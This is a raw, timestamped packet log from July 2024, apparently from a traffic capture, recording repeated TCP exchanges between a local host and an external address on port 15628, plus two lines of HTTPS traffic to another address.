Jul 20, 2024 16:31:27.407938957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.413584948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.419280052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.424458027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.428267956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.435878992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.440028906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.445318937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.445732117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.451673031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.455981970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.460985899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.461049080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.466003895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.466073990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.472248077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.472306013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.477838039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.477895975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.483464956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.483536005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.488522053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.488586903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.493614912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.493715048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.498706102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.498769045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.503648996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.503707886 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.508660078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.508718967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.513863087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.513926029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.518990040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.519056082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.524043083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.524106026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.529643059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.529702902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.535105944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.535161972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.540110111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.540174961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.546421051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.546480894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.552411079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.552465916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.557573080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.557666063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.562800884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.562866926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.569190025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.569248915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.574736118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.574791908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.579766989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.579824924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.584938049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.584994078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.590023041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.590075970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.597223043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.597276926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.603480101 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:31:27.603497982 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:31:27.603943110 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.603992939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.612436056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.612493992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.618877888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.618935108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.624869108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.625039101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.630561113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.630621910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.635761976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.635818005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.644251108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.644304991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.650157928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.650212049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.655201912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.655271053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.688190937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.688257933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.694343090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.694407940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.701462984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.701529980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.707221031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.707285881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.713140965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.713193893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.722543001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.722599983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.728789091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.728846073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.738152027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.738203049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.744225979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.744282007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.749294996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.749361038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.754405975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.754462004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.759794950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.759851933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.765028954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.765095949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.770298004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.770353079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.776431084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.776485920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.785927057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.785988092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.793632984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.793692112 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.798968077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.799115896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.810795069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.810862064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.815841913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.815902948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.821336985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.821391106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.826721907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.826778889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.831769943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.831826925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.838340044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.838401079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.843548059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.843606949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.848932028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.848984957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.855602026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.855667114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.860595942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.860658884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.867660046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.867716074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.872602940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.872661114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.880011082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.880086899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.885258913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.885320902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.890480042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.890547991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.899914980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.899969101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.906546116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.906605005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.913197041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.913252115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.923446894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.923511982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.930944920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.931013107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.942261934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.942327976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.950633049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.950695038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.957870007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.957931042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.963210106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.963264942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.969672918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.969726086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.974567890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.974620104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.980618000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.980678082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.985621929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.985678911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.991976976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.992038012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:27.996948957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:27.997006893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.002924919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.002978086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.008234978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.008287907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.014245987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.014301062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.019181967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.019247055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.024147034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.024209023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.029609919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.029666901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.034759045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.034812927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.041163921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.041218996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.046550035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.046605110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.051866055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.051920891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.056926966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.056981087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.062491894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.062547922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.068003893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.068078995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.073225021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.073272943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.088001966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.088076115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.093225002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.094744921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.101002932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.101074934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.106965065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.107033014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.112024069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.112085104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.116926908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.116987944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.121985912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.122039080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.148318052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.149223089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.155378103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.159463882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.164762974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.164810896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.169776917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.169830084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.175302982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.175364971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.180294037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.180347919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.185620070 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.185673952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.190633059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.190685987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.195741892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.195801020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.203177929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.203237057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.209068060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.209120035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.214381933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.214441061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.220204115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.220254898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.225085974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.225142956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.230298996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.230370045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.235268116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.235322952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.240263939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.240318060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.245325089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.245381117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.250742912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.250809908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.255950928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.256038904 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.261226892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.261285067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.267987967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.268062115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.273015976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.273075104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.278506041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.278553009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.294796944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.294853926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.300432920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.300498962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.319453955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.319515944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.326205015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.326262951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.331804037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.331870079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.336899996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.336966038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.342024088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.342084885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.347304106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.347357988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.352274895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.352355957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.357562065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.357625961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.362617970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.362682104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.368050098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.368503094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.373644114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.373708010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.378621101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.378685951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.383943081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.384018898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.389230967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.389317989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.394248962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.394351959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.399158955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.399210930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.404226065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.404509068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.414205074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.414271116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.419533968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.419595957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.424859047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.424926043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.429994106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.430540085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.435592890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.435666084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.441190958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.441265106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.446655989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.446749926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.451834917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.451890945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.476349115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:28.480262041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:28.483999014 CEST	49722	15628	192.168.2.6	154.204.0.5
